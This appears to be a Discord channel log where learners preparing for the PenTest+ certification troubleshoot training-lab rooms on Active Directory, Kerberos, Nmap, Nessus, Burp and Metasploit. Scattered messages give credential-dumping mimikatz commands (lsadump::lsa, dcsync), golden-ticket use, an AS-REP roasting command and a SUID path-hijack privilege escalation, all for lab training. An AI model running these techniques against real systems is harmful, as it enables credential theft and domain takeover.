#pentest-plus-path
What would you recommend?
I'm also wondering
hi Mal
To pass the PenTest+ certification, I recommend taking Jason Dion's course on Udemy; he is a really good instructor. But I don't think you should attempt the PenTest+ certification because it's a very theoretical certification. I would suggest you go more for certifications from vendors like OffSec or eLearnSecurity.
Pentest+ satisfies DoD 8570 which is a big thing in the US
Royal salutations à tous
Bro, open the AttackBox and use the same script you used on your VM or whatever you were using.
very simple
The error is that you don't have
the module on your VM.
The AttackBox has it preinstalled.
Hello folks. Having trouble in Attacktive Directory with the Impacket tools: "No module named impacket.examples.utils".
Means you don't have Impacket installed correctly.
salut mec
Is it much harder to do theoretical? I'm also aiming for eJPT.
How can you get more experience?
I haven't attempted the eJPT, but I have heard that if you solve CTFs it won't be too hard. About the difficulty, I think that always depends on your preparation. In the case of the PT+, it is reputed to be a hard exam and there are many, many terms and definitions to know by heart. It is more fun to prep for a practical exam as it requires you to do practical things. To get more experience, just do CTFs.
You're an absolute unit. Thank you for the help!
Gave +1 Rep to @normal quarry
You're welcome! If you have more questions, do not hesitate!
good day guys!
I am having a problem with Attacking Kerberos room!
I can't seem to understand where to put which hash in the golden/silver ticket task.
can I get some help please?
the krbtgt one ?
If I understand your problem well, you do not understand how Kerberos works.
The krbtgt account always signs the ticket with its hash, so you have to use that one.
I understood that lol!
I don't understand one thing now.
How can I get passwords after I have gotten a golden ticket?
A golden ticket as administrator can do anything
So when this ticket is in memory you can do anything, including dumping hashes with mimikatz.
Are you looking for the command to dump hashes with mimikatz?
You can't directly get passwords; normally you can only get hashes.
Then you can crack those hashes.
how do you get hashes?
I couldn't locate system32/SAM.
If you're system, there's often cached passwords in memory you can grab
Yeah, I know that; that's why I said normally.
You can use mimikatz
lsadump::lsa /patch
lsadump::dcsync /user:<DOMAIN>\<USER>
Hey all! I'm trying to understand Q2 on OWASP Top 10 in THM.
How many non-root/non-service/non-daemon users are there?
I did not see anything but how do we tell if there are users?
If you can check a specific file you can see all the users of a system.
Then from there you are looking for something that on Windows would be equal to a Documents folder,
but on Linux is called the /home folders.
Thank ya!
Gave +1 Rep to @torpid lance
Okay!
To you guys, is learning how to hack literally Googling? I'm starting to realize this because I don't know a DAMN thing.
To some extent, yeah... learning how to search and find answers to problems you are having is a huge part of tech stuff, including hacking and programming.
90% of it really
and the other 10% can be reading your past notes for how to do things instead of searching it up online
What would you guys recommend as a website that you can always refer back to?
Kinda like the place where you get your notes from?
I literally don't know shit about fuck and coming off of Security+, this is a whole different beast!
I use some particularly high quality THM rooms to refer back to, along with manuals and just google searches
That's awesome man! I thought I began to understand and then I look at a new technology and then I'm even more lost
Any time you're doing something new, it'll take you some time to find your feet
Hey folks, I am preparing for the PenTest+ exam; any tips and guidance would be highly appreciated.
Learn your tools and switches, practice a LOT
Hi guys. Faced a problem on the last room of the path (Post-Exploitation Basics).
Task 3 Enumeration w/ Bloodhound
I do everything like it's written. Collect data with SharpHound, copy it to the AttackBox with scp. Then I try to import (Import Graph) and it fails with the error "Bad JSON". Also tried to import with drag & drop. Then the import freezes with the message "File created from incompatible collector" (in View Upload Status).
You probably have to downgrade your version of bloodhound. I had this same issue and a few other posts like this; downgrading bloodhound seemed to work
Not sure if it's possible on the AttackBox. Local Kali maybe too. Maybe build from source.
bloodhound
For some reason, in the Attacktive Directory module I'm not able to download BloodHound.
I keep getting the error "E: unable to locate bloodhound".
are you using your own VM, or the attackbox?
attackbox
apt install bloodhound neo4j is the command I'm using.
Yes
Oh really, I didn't know.
ok let me check
ok i see it thanks
BTW, is it possible to post screenshots in here?
Hello guys, I'm currently working on Attacktive Directory and keep getting an error when trying to run GetNPUsers.py
"The two versions should be equal; check your installation."
I'm not exactly sure what to check.
Please don't post in multiple places, It's spam and just makes it harder to solve problems
You know what this is considered, right
?
Yeah...
But I offered them help elsewhere.
Didn't want someone else to come in here and get confused.
All good, I'm more messing with you than anything else 😄
So the whole mini-modding thing is dependent on who you are?
interesting
No.
So.
Robert gave the person an answer in a different channel and asked not to spam on multiple channels.
I gave an answer to someone in a different channel and asked them the same.
Why did I get told off for "mini-modding" but you were joking with Robert?
I expected you to be more conscious on recognising what I was doing here.
This is not the right channel for that anyways.
If you want me to DM you, let me know.
Sure.
Hi guys, I am about to start my local-host vulnerabilities module. Any prerequisite?
As for the Windows fundamentals, I only finished part 1, alongside the web fundamentals pathway and the first three modules of the PenTest+ pathway.
Regarding Post-Exploitation Basics Task 3, I found the most success using the Attackbox and the last Bloodhound version before version 4 (3.0.5 I think). After unzipping the download, run the file named "Bloodhound" in the folder using the "--no-sandbox" flag, and you should be good to go. DON'T use the version of Bloodhound already installed. As of 8/28/22, it's not compatible with the version of SharpHound on the Windows machine you're running mimikatz and whatnot on
Hope this saves people some time troubleshooting
Nice, thanks crow... going to bookmark this answer for shadow using this @true frigate and hope to remember this when they need it to help others.
Gave +1 Rep to @vernal plover
Cool 👍
One more thing: for Attacktive Directory, simply using "python3 impacket ..." didn't seem to work, but "python3.8 impacket ..." did. Something about the default version of python3 in the Attackbox not being compatible with the current version of Impacket (it mentioned needing Python version >=3.7). However, I don't remember whether or not python3.8 is already in the system or if it needs to be downloaded
The AttackBox uses python3.9 for these tasks, I believe. I'll update the room.
This should make it clearer
Ah yes, it was 3.9. Thank you!
Ty. Hope that works. I just wasted hours getting BloodHound to run properly -.-
Hope it works for you too 👍
It did import the zip file using BloodHound 3.0.5. Thanks!
Maybe someone from staff could update the room, giving a hint for the working BloodHound version.
Gave +1 Rep to @vernal plover
Yeah, because if memory serves, I only figured out the correct Bloodhound version by looking through this Discord
Ah, I missed this when I updated the other thing... BloodHound was updated on the AttackBox so that the new AD networks work properly. The joys of backwards compatibility with other rooms... I'll speak with the room creator and AttackBox maintainer and see what the best solution is.
As it's a free room non-subscribers will find it a bit harder to get the Bloodhound 3.0.5 zip onto the VM, so I'm reluctant to just say "install this version" in the room
You rock 👍
I didn't know that was a thing, I'll check it out, see if it's on the attackbox and add it into the suggestion 🙂
Not sure what I'm doing wrong there... Even the verbose option doesn't give me much.
I wondered for a sec, then figured it'd probably tell me XD. Fixed that and get the same error. If you could, that'd be great; might be an ID10T error, but I'm not sure.
Nmap is saying yes. If the command is suboptimal I blame beer and lack of sleep 😄
Domain controllers tend to have DNS open,
is what shadow has learnt from the few rooms on Active Directory.
Yeah, port 53 is listed as "Microsoft DNS".
Granted, you're scanning TCP and it was complaining about 53/udp.
Ah yeah... Good point
I'll see what happens, There's some other things that are higher priority first 🙂
Thanks for checking though
Gave +1 Rep to @torpid lance
Hi, I am on the last step of Post-Exploitation Basics and my local BloodHound server does not accept folders as import,
and when I tried to import the JSONs one by one a "bad JSON" message appeared.
Drag & drop the zip 🙂
Should work.
Regarding Post-Exploitation Basics Task 3, I found the most success using the Attackbox and the last Bloodhound version before version 4 (3.0.5 I think). After unzipping the download, run the file named "Bloodhound" in the folder using the "--no-sandbox" flag, and you should be good to go. DON'T use the version of Bloodhound already installed. As of 8/28/22, it's not compatible with the version of SharpHound on the Windows machine you're running mimikatz and whatnot on
Hope this saves people some time troubleshooting
@wooden ice
thanks I will try this
Gave +1 Rep to @true frigate
+1
It works. Dropping the zip is the only way to import.
Hi, I'm not able to access the target machine via RDP.
xfreerdp /dynamic-resolution +clipboard /cert:ignore /u:CONTROLLER /v:10.10.170.157 /u:Administrator /p:P@$$W0rd
Are you on the attackbox?
You might need quotes around that password, as it contains special characters.
Could someone help clarify in layman's terms what a reverse shell is?
Thank You. Had the same Problem and it worked.
Gave +1 Rep to @idle smelt
A shell that connects back to provide access. Idk if that ever got answered.
Hey, so I'm trying to use Burp Suite, and in task 9 of the Burp Suite room it says to download FoxyProxy. When I tried using it on my own Kali VM with Burp Suite, it won't work. Like, I entered the proxy information and that caused my searches to hang, but I never see the request in Burp Suite.
Everything works fine when I use the "open browser" option in Burp Suite itself, but I'd like to know what I'm doing wrong while using my own browser as well.
Anyone use FoxyProxy in their own VMs and know how to set it up?
Check the proxy tab and make sure intercept is off.
Firefox should error out if you have pointed it at a proxy that doesn't exist
So I was trying to download the cert for Burp Suite so I can access sites through the proxy, but to go to the site to download the cert it says I need a cert... I'm not sure if I'm explaining things correctly or if I'm just making a dumb mistake. How do I download the cert to use Burp Suite? I tried following the troubleshooting instructions but that didn't help either.
https://portswigger.net/burp/documentation/desktop/external-browser-config/certificate
This includes troubleshooting
I'm finishing up the THM path but I feel like I should still do more before my cert exam. For those that have taken the exam, what all did you use to study for Pentest+?
Hello, so I went to the site you gave and it said to download the cert I need to go to http://burpsuite. But when I go there I get this.
It still says I need the cert, but I thought I had to go there to get the cert.
You are trying to go to the wrong website.
It should be http://burpsuite/, not https://www[.]burpsuite[.]com/
Yeah, that isn't working either.
You need to connect FoxyProxy to Burp's proxy first,
or http://burpsuite/ will not work.
I tried that too.
If I do this it just says I need the cert to connect.
But I'm trying to get the cert.
I feel like I'm just missing something very obvious, but idk what.
http not https
I tried that too, but it's ok, I figured it out. A YouTube tutorial did something completely different, but it works, so wooo.
nice nice
You need to accept it initially
Working on OWASP Top 10 task 26, where you create the Python script in base64 and put it in the cookies. I keep getting this response for nc. Any ideas?
Looks like I have a connection but I can't find it
hi
I'm having a problem.
root@ip-10-10-159-117:~/Downloads# python3.9 /opt/impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for svc-admin
[-] [Errno Connection error (SPOOKYSEC.LOCAL:88)] [Errno -2] Name or service not known
Connection error.
Anyone can help?
nop
How can I do it?
ok
And then??
and then?
It will work. xD
cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 tryhackme.lan tryhackme
The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
That is what I saw within
What information did you find with Lassi's advice?
cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 tryhackme.lan tryhackme
The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
But what do you do with a hosts file?
nothing else
Are you sure?
Google.
What do you do with a hosts file?
ok ok
I'm doing the Nessus room. On task 4 question 5 it asks a question based on the scan that I'm supposed to perform. I put in the IP of the machine THM gives and I put in all the correct settings for the scan, but I get no vulnerabilities when the scan is complete. I know that vulnerabilities are supposed to show up, because when I followed the write-up in the help section it shows that vulnerabilities appeared and that would give me the answer to the question, but I can't figure out why I'm getting nothing when I perform the scan.
Why is it that when I type in the IP in the AttackBox the website comes up, but not if I type in the IP in my actual browser or in a VM?
Are you connected to OpenVPN yet on your browser or VM?
No, do I need to be connected to access the site?
Yes, you need to be connected to the THM OpenVPN to access the machine that you started in there.
Facepalming hella hard rn lol, thank you.
Gave +1 Rep to @maiden remnant
Does it matter if I have the VPN on my actual machine or my virtual machine?
The VPN helps you connect to the remote network,
and by this you can only connect to one VPN while doing a room in TryHackMe, and I recommend connecting to the VPN in the VM.
Gotchu, thanks.
I was asking cuz I was running the scan but it's been running for like 10+ min, so I was starting to wonder if I did something wrong.
Rule of thumb: ping it first before you run any scan (unless the machine blocks ICMP).
In the Nessus room (basics, installation etc.), task 4 scanning, there is a question about the scan type for a lower-bandwidth connection.
I think I'm looking where I'm supposed to, but even after finding the correct answer text on the interwebs I cannot find it in the Nessus screen. Is it a bug or am I reading very poorly? I'm on Nessus v10.
Same for the next question on the Apache HTTP server version...
Same for the first question on task 5; it seems the plugin has been replaced by a recent one with a different ID
this one had the answer to the question in task 4 found out in task 5 🙂
Yes there is.
The brackets count as stars
I would say port scan all ports.
ah damn
Okay
Thanks
Forgot the brackets.
My answer is incorrect here.
Anybody knows why?
Also Nessus bad.
is it?
Eh, I don't use it as much as I used to.
I mean there's few alternatives
I'm making a new Vm and I won't be putting Nessus on it.
I'm just trying the basic pentesting tools room, so that's why I'm using it.
Any alternatives?
I like the interface though.
It's like an nmap scan with a GUI.
It does a hell of a lot more
Plenty of issues with it, I mean you got one just now. A false positive on something reasonably simple.
good point
Has anyone used the PenTest+ discount recently? I've had no luck applying the code. Curious if it's user error, or the voucher is expired (it says it expires Dec 2021, but I see comments this year of people explaining how to apply it).
@edgy tulip said it was extended, but I've seen some people mention it doesn't work.
Thanks, good to know that it is not just me.
I've emailed THM help, so will see what comes.
Gave +1 Rep to @spiral hollow
No idea why, but I finished the Active Directory room and suddenly it's marked as undone. How?
There are two AD basics rooms.
You may have done the old one.
But it was in this path and it was marked complete? @spiral hollow
Perhaps in the late UI switch they swapped over the rooms.
Yeah, but it can't be, because it's the same questions I already answered.
Look at the bottom of the room to see how old it is.
I'll check it out in a moment
The room is 52 days old.
Guess I'll start it over again.
It's just weird that it didn't reset tasks 1 and 2.
So I think that it is a bug.
It may be that only the other was changed, and tasks 1 and 2 stayed the same, meaning you'll only get reset on the ones which have changed.
Thank you! But... 😄
Currently on Attacking Kerberos Task 4. Looking at the previous chats in here, I'm having the same issues cracking the hash, with no success. Any ideas as to what I'm doing wrong?
The instructions say that the "Pass.txt" dictionary is just a shortened version of rockyou. I decided to just use rockyou since it's already on the AttackBox.
oh...
silly words 😆
Downloaded Pass.txt (1240 lines), retried cracking the hash, and no joy.
Noted. Thank you
Is there anyone who's doing the offensive pentesting path right now?
Going to start
Anyone have a penetration testing room in TryHackMe?
What do you mean by that?
If you have created a room where people can learn PT.
Please let us know what's the update, is the code expired or what?
Why are you spamming all the channels, mate?
He thinks he is funny, after doing 5-year-old kid stuff and then deleting it like nothing happened.
He was banned; he was a scammer. He was DMing in private the moment you were replying to his messages.
Interesting, hope in future there will be fewer annoying people.
Can anyone tell me if this path still gives a discount towards the voucher? I can't find anything at the moment to point towards it still being an active offer.
No the voucher date is expired.
But apparently it's still valid
As a general rule of thumb, you are always best off with asking your question right away, that way it's more likely someone will respond 🙂
Ok, so when I copied /bin/sh into curl and started /usr/bin/menu, the new shell ran as root because /usr/bin/menu was owned by root, right?
Well, it's giving you a root shell because the SUID bit was set, as well as it being owned by root, yes.
Besides that, this is only working because the menu binary is not using full paths.
Thanks mate
@idle brook Hi. I noticed your eJPT cert in your THM profile congrats. How would I add a cert to my profile.
You can ask a mod to add them. Which certs do you have? For some, proof may be required
Ok, you have it 🙂 Might wanna change your pfp re your name.
Thank you Dolphin for the help greatly appreciated. I'll change back .
I was doing the Post-Exploitation room and got the loot.zip file using scp to my local machine, but BloodHound is not accepting the .json files or the zip file.
Neo4j is running perfectly fine.
I also get this when I start BloodHound.
@zinc merlin
What do you guys think about the certificate, is it enough to look for work?
?
I don't think so, but it's a good start.
I think I'm gonna do it; any recommendations for the next cert?
PNPT is pretty nice.
From TCM Security.
@civic falcon check out the certification pathway Paul Jerimy made:
ty
Gave +1 Rep to @frosty orbit
This is pretty darn nice .
It’s dope to see everything listed visually. Especially when starting out because it can become quite overwhelming.
True, especially since it's easy to see all the popular certs (that you might not know about).
Would you guys say that after completing this path, you were prepared for pentest +?
Or is there anything else I should go out and look for to study
I'm thinking of going for it next potentially
I think I'm gonna do PenTest+ anyway and then go for beginner paths, like CEH, Kali Linux Certified Professional. I don't know if this is the correct path; any opinions?
Just this path alone won't help. You have to be able to identify and use 50 tools for the exam. Plan, scope and report a test. You can get a study guide online for $30 or a Udemy online course.
Can anyone help me find the command switch used to scan all the ports in nmap?
man nmap
Have a read through.
I searched in the man page but couldn't find it.
https://nmap.org/book/port-scanning-options.html#port-scanning-options-ports here you can find your answer.
I started with the eJPT certification. Great hands-on learning. In the exam you pentest a fake company. You get 72 hours to complete the pentest and answer 20 questions. The cert won't land you a job. In my opinion you will learn more from eJPT than CEH/PenTest+ combined and save a couple thousand dollars.
Are the Jr Penetration Tester path and the Offensive Pentesting path enough to get the eJPT cert?
I think that the eJPT cert is good enough for an entry-level/intern job. Am I right?
Yes. Tryhackme and eJPT course is enough to pass eJPT. It's the only training I had when I took the exam.
Any promo code for the eLearnSecurity Junior Penetration Tester v2 exam voucher? xD
@wintry bone 🤟🏾
?
Good shit... that nmap post... Ty.
Is an eJPT voucher bought from any source other than their website legitimate?
Took and passed Pentest+ this past weekend, and this course truly was VITAL in helping me understand a lot of the questions.
Did you do another course to pass the exam?
I used Dion's PenTest+, but I learn better by doing rather than having someone tell me info.
Do you guys reckon it is feasible to pass the PenTest+ as my first cert? Assuming I put in the work, of course.
Hello, my hashcat isn't working when I try to crack a Kerberoast hash.
Can someone explain why when I use the first smbclient syntax I cannot get the .txt, but if I use -Uusername%password that works? The first one should work, right?
Because smbclient uses it for logging into the system, and for that it needs a username and password.
With smbclient you can only list shares without a password and username.
How is the comptia test structured?
You were in the wrong directory the first time. A directory you couldn't write to.
It's not to do with username or password. Look at the error, error opening local file. Local means on your machine
The test is 3 skill questions and the rest is multiple choice. That said, the questions are posed in a way that you need to read them carefully. You need 87% or so to pass. Several answers can be right, but one might be more right than the other.
hey
I have a problem with BloodHound in the last room,
the post-exploitation room.
I gathered the loot in a zip file,
but when I'm trying to upload it to BloodHound it won't load.
Incompatible something.
Upload a newer version of SharpHound or use an older version of BloodHound... as the room is quite old, the BloodHound on the AttackBox or in normal repos is a lot newer and therefore incompatible with the older version of SharpHound on the target machine.
Hi I am trying to use Openvpn in Kali to access the first machine in this learning path. It is showing me that I am connected but I cannot do anything from my VM even though it is showing me as connected to THM.
Might be because you have NAT set for the VM
That's OK
NAT for the VM doesn't stop the VPN working
Ah ok. Sorry then
Quick question: I'm trying to perform an Xmas scan ($ sudo nmap -Pn -sX -p 1-999 10.x.x.x). This is the second question on Task 14 of the Nmap room. I keep receiving "999 ports are in an ignored state" (meaning being filtered, most likely by the firewall). I thought by using -Pn I would be able to evade the firewall's ICMP block?
No, that's not what -Pn does at all
-Pn assumes the host is up
Nmap's ping probes aren't just ICMP probes, there's a lot more to it than that
And Nmap can't just evade the firewall's block. The block is a solid rule.
Which question in said room and challenge are you stuck on???? Also read ninja james's messages as they explain things neatly.
@true frigate hmmm, it's question 2 on task 14 of the Nmap room. I know the answer, but I'd like to learn how and why.
That seems like a super easy question to answer to shadow... as you kinda answered that above.
999 ports are BLAH.
Also a heavy recommendation when using nmap is to at least add -vv to it
to have more verbosity.
@keen hornet ahh, I see, thanks.
Gave +1 Rep to @keen hornet
@true frigate will do, thanks.
no problem
I'm having a strange problem where I can't get the hashes from the Kerberos room out of the terminal in a form where hashcat will recognise the format... any ideas or suggestions?
The main problem seems to be it copies the format with line returns and spaces 😦
Ah yeah, that problem... Shadow used a text editor with search and replace with regex support.
Yep, trim those and it'll work. I think there's an argument for the program that outputs hashcat format.
Does finishing this path still give you a discount on the cert exam?
Yes, 10%.
Why, thank you shadow. I'm still plagued by the problem, but will endeavour to broaden my mind and explore the regex replacement method once one has found time to explore the command switches... thank you.
Gave +1 Rep to @true frigate
Thanks
Gave +1 Rep to @mighty stag
I'm in the Vulnversity room and can't connect to the machine. Firefox says "unable to connect". It's been that way since yesterday. I terminated the machine, refreshed the browser, activated the machine again, but nothing will do. Can anyone help me sort it out? I have completed the "reconnaissance" and "locating directories" sections with no problem. Then I moved to "compromise webserver" and the issue began.
The AttackBox has Sublime Text, which has the ability to do search and replace with regex.
Do you have the right port?
Do I need a port to open a webpage in the Firefox browser?
No, but you need to connect to the correct one here.
Hey, I was wondering if anyone has run into this with the CompTIA PenTest+ path. (Also, feel free to delete this if this is the wrong channel for this question. I wasn't sure if this fell into tech support or not.) I completed the path to get a 10% off voucher for the actual PenTest+ exam, but the discount code expired at the end of 2021. Does THM still offer a valid discount these days, or has that offer long expired?
I guess the code works for the test voucher, but not any of the bundles. It doesn't seem like codes can stack either, which is fine. For people trying to save money on bundles like I was, the best bet might be to join the club for $50 and get 20% off. Sorry if this is getting off topic, but I know that code was a big carrot for me completing the PenTest+ path before looking at official study materials 🤷 I assume other people in this chat would benefit from that info, but feel free to delete this if it's too off topic.
Cc @edgy tulip might be worth investigating?
I'm doing the Nessus module. Anyone know why my Nessus scan isn't getting results? I installed Nessus on my Kali Linux VM and ran a scan targeting the TryHackMe machine, and nothing is output.
Hi guys, I'm having a challenge with kerbrute on the Attacktive Directory challenge room. I have given my kerbrute executable permissions, but I keep getting a "permission denied" error when executing commands. Has anyone faced the same problem, and how can I resolve it?
Hi guys, I recently installed Nessus, but after a while I got an error during plugin installation, so it's installed but without plugins. Is there a way to install plugins without reinstalling?
While trying to pull kerbrute from GitHub, I am facing this issue. How to resolve this?
I gotta say the Attacktive Directory room is just terrible. I have never encountered so many problems trying to install various programs, from BloodHound to evil-winrm; I get error after error, and I cannot find any help. I really wish I could get my money back from TryHackMe. I am wasting so much time not learning pentesting, just trying to get these programs to install properly. IMHO, this room is a piece of crap.
They are not installed already in the AttackBox.
And I wanted to set up my own Linux machine for pentesting.
Hi, I'm encountering a problem since last week and I need to find out where the issue lies. When I run nmap with the -p- flag, I get "Starting Nmap 7.60" and it hangs there forever; nothing ever happens again. But when I run it with no flag or with a range of ports (e.g. -p200-400), it works flawlessly. So what's wrong with the all-ports -p- flag?
It depends on your internet speed and also the scan type, e.g. if you are using a TCP connect scan it will take longer than a SYN stealth scan.
Hello
Hi
hi
hi
Gm.
Hello 👋
Hey guys!
Does anyone have any idea about the "bad JSON file" error in BloodHound?
I'm trying to import the JSON file for the Post-Exploitation Basics room in task 3, but I'm unable to do so.
Can anyone help me regarding that?
Yup, that is because the SharpHound.ps1 on the target machine is old, so it is not compatible with the newest versions of BloodHound... either upload a newer version of SharpHound.ps1 to the target machine or use the latest 3.0.x release of BloodHound.
Thanks, will give it a try to downgrade BloodHound.
Has anybody else finished the PenTest+ path but the progress is stuck at 99%?
thanks
Gave +1 Rep to @spiral hollow
Is there a way that I can start neo4j version 4.0.1? The current version I have is 4.4.16.
In the room "Post-Exploitation Basics", in "Task 3 Enumeration w/ Bloodhound", trouble. On the victim's machine there is an old version of the .ps1 script, and BloodHound can't read this dump. When I download a new .ps1 file onto the victim machine I get some errors when I try to do the dump... it is awful.
Do these rooms ever get updated? Instead of learning, I'm administering to get the job done.
Please, change the SharpHound.ps1 file to the new version on the victim machine, or make a remark "only BloodHound version 3.0 supports the dump file", because I can open the dump file only in version 3.0 of BloodHound on the AttackBox.
Anyone know why the Vulnversity room in the Complete Beginner and PenTest+ pathways is showing as incomplete, but when you enter the room, all tasks are completed?
This is already a #1092490706385383524 and is being looked into by THM Staff.
Ok, perfect, thanks for the heads up.
Gave +1 Rep to @vapid cipher
Hi,
Did you manage to finish everything from the CompTIA PenTest+ path, but can't download the certificate because one room is unfinished (even though progress is 100%)?
It's because of the Vulnversity room; it's a known bug, they're working on it #1092490706385383524
Thank you, but this bug has status resolved...
What do you mean?
I reported this bug and I can see the status
It's right there in this channel #1092490706385383524, I would guess it means they acknowledge your report
Hey y'all. I'm on task 14 of the Nmap section of the PenTest+ learning path.
Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)?
I've got my machine running on 10.10.134.218 - Which machine am I supposed to be scanning for the answers?
If it really says MACHINE_IP, you need to go back to task 1 and start the machine there
Ah, it expired. Forgive me, new to the THM platform, it's loading right now. Thank you for your assistance @daring ore!
Gave +1 Rep to @daring ore
It happens, especially when there's so much to do in a room. You're welcome 🙂
anyone help me ??
Hi everyone, currently working my way through the Attacking Kerberos room and am running into an issue when trying to enumerate users using Kerbrute. I've added the DC to my hosts file and am using the user list from the room, however Kerbrute isn't finding any users, can anyone help me please?
ah ignore me, I used wget to download the user file but it downloaded the web page instead of the list, I knew it would be something really stupid
@topaz cobalt Glad you found a solution. Have to mention that in future, the switch -v may save you quite a bit of debugging time. It can reveal an issue Kerbrute wouldn't otherwise let you know about. Like if the user has Kerberos pre-auth turned off (should ring some bells!) or if there is an error with authentication. Like if your attacking machine's time differs greatly from the time on the DC (cannot authenticate successfully). :)
Running Attacking Kerberos room and having some issues with the hashcat command giving me errors, I have watched a few walkthroughs that show people using nano to put the hash into a hash.txt, I tried this but still get the same error, when I review the file the hash is split up, not sure if it's supposed to do that. I have tried also using the 23$ and without, still get the same errors.
you do need to fix the separation in the file
remove any space
you definitely need the 23$
Alright, will try that.
let me know how it goes
Cracked! Awesome, thanks.
you're welcome 🙂
Hi. I'm currently working on OWASP Top 10, Task 5 and I'm trying to connect to the evilshell.php link, but it tells me that my browser (Safari) can't find the server machine_ip/evilshell.php. I tried using Google and I get the same error message. Any suggestions?
Do you have an ip, or does it state "machine_ip" ?
Hello, in OWASP Top 10 - Task 18... the link provided to https://example.com/bank?account_number=1234 does not work. Also, in Task 19, which VM are they referring to, I do not see a link of any sort? In task 20 we are supposed to connect to a http://MY_IPADDRESS active machine but it simply comes to a page titled Note Viewer with a login and password form. The instructions state to click on "Reflected XSS" in the menu but there is no menu.
Task 25 requires to connect to http://machine_ip address as well and the Note Viewer page pops up.
Does it say "machine_ip" or does it say the IP of the machine?
Sounds like you haven't deployed the targets, and that first example is an example...
can you please look at the URL in Task 18, it does not make sense. Also, the website we were supposed to visit for the 2nd question of task 18, it is the note viewer page and when putting in the credentials listed on the lab, a message comes up saying "I am noot!." it does not provide a key
nevermind i got that figured out
task 20 - XSS - same Note Viewer Page shows up... I have started the machine
I've checked some THM walkthrough pages and the instructions do reference a "reflected xss" tab
ok i reset my vpn and the machine and was able to get it to work, sorry for the inconvenience
Hey guys, is this path really beneficial while studying for the Pentest+ cert?
It has content that is for the pentest+ cert... so yea. It can come in handy
Anyone have an issue with attackbox on the Post Exploit room at the end?
Attack box doesn't have the loot.zip file preloaded to utilize with bloodhound. Can't SCP it from the windows client without Attack box root password. Unsure how to get loot.zip to attackbox
I stg...
@pine pine ^ Thats all I had to do last night...
oh man... lmao!
Are CTFs an actual staple as far as the bread and butter tasks that pentesters do, or are they just to develop the skills in the tools used and methodologies?
what would you guys recommend as a prerequisite to starting this learning path? I know the website says to have "theoretical knowledge of the pentest+ syllabus", but is that absolutely needed? thanks in advance
#974406074444685322
#pre-security-legacy-path
#junior-pentester-path
#878393611929129000 optionally
then this
i did intro, pre, and i started complete beginner, but was wondering if i could jump to pentest
also thank you very much for your response
no problem
Hey all, I'm working on the kerberos room that's part of this path, so far no issues but I do have a question that I can't seem to let go. With kerberoasting and AS-REP roasting, how does the actual cracking part work? I am familiar with the traditional methods of password hash cracking but as far as I can tell this is different: normally you have the hash of the password, then you go through your word list hashing each one and comparing. But in this case you have the hash of the TGT, so how does hashing passwords and comparing them to the TGT hash help at all? Thanks in advance - I can't find any clear explanation anywhere (probably because I'm misunderstanding something)
Hey guys, I'm on the metasploit part and trying to do the eternalblue exploit but get this "Exploit completed, but no session was created."
I'm using kali in a VM and have changed the LHOST to the openvpn IP. Any other troubleshooting ideas you guys have?
You're using the wrong IP.
RHOST is the target. LHOST the Listener Host, so your tun0.
sorry- thats what I meant. I did set LHOST to my tun0
not according to what you typed here you didn't.
Do you have a machine open?
yes its active
Can I have the ip please?
10.10.171.205
Can you verify your account please, and type options and then send a screenshot?
!docs verify
I was setting LHOST to the actual IP, not "tun0". Would that make a difference? I'll try again
Typing tun0 saves you typing the ip, tun0 is the name of the interface.
You also might want to restart the machine, I kind of broke it...
lol okay
Once you do, go through the steps and then double check with options.
Thanks man, it's working now. I was using setg before, if that could've had any effect
Has anybody else had issues installing kerbrute?
I'm working on installing krb5 instead
When I run the command kinit root/admin@KALI I receive the message kinit:Cannot contact any KDC for realm KALI while getting initial credentials. I checked the .conf file and the domain is set up, systemctl confirms the server is running
nevermind DNS was not configured properly. It is now
Hi, I am unable to download the completion certificate for the Pentest+ Path. I just finished it today, as tomorrow progress will be lost for the rooms disappearing, as per the THM email. My issue: when I click to download the certificate, a pop-up window appears in brown saying "Fetching certificate, please wait", but then nothing. Thanks if you can help.
Turns out I can download the certificate when I use Chrome, but not Firefox. I don't know why (maybe some extensions interfering on FF?) Issue solved.
hello, can someone please help me understand what exactly the --data-length flag does? I understand it appends random data to the packet sent, but why do we need to add extra bytes to the packet?
It doesn't seem like there is much help unless you ask at a time when others are present
Understood, thank you!
Has the Pentest+ Path been updated yet? still looks the same as before from what I can see
ah, now it looks updated
Finally passed the exam last night
Congrats!
I'm just beginning the study path of preparing for it
@keen dew It's a good time for that since THM just updated the Pentest+ path.
What they added makes a lot of sense especially adding python related rooms.
Ya I had completed the Pentest+ path before but I just reset my progress for all the new rooms and starting fresh
Hello, would pentest+ path be better to start prior to Jr pentester path for a beginner?
prb not
There is a recommended path that is shared by @true frigate, but I can't seem to find it.
Thanks!
Gave +1 Rep to @spiral hollow
Thank you!
Gave +1 Rep to @vapid cipher
FYI for the CompTIA Pentest+ path, in Python Basics, in Task 5, the pre-coded script is incorrect.. many of you already know but just throwing it out there anyway... The correction was made by adding a separation between "bob"; and hungry.. like in this 2nd screenshot..
I wanted to test it, not assume the code worked. When I tested the pre-coded version in the 1st screenshot, it threw an error, so I added a separation; the 2nd screenshot is the corrected version.
BTW, I did pass the Pentest+ PT0-002, it was fun to do and I wished there were more hands-on. Should be 50% hands-on and 50% multiple choice.
should i do this path before web fundamentals?
I would go with web fundaments first.
will do. whats your reasoning for choosing web first though. just curious
You'll need to start with the basics first as they'll strengthen your foundation later on. Aside from that, the pentest path may have more advanced topics as well.
OOPS! I thought this was the jr pentester path channel. I meant to ask between that one and web fundamentals
There is a recommended path in the pinned post in the #general channel.
Guys I am having issue with connecting to the network in breaching AD
Can anyone help me with that? I tried all the methods
Did you check the pinned messages?
Yes
pinned messages in #pentest-plus-path right?
No, in the channel #breaching-ad
Thanks! I will check that out
Gave +1 Rep to @spiral hollow
Hi, I am doing the Python for Pentesters room. I am stuck at the SSH Brute Forcing section. I bruteforced the password for tiffany, but I cannot log in. Using ssh in verbose mode I get this: debug1: expecting SSH2_MSG_KEX_ECDH_REPLY, and there it hangs. Can anyone help?
restart the machine and try again
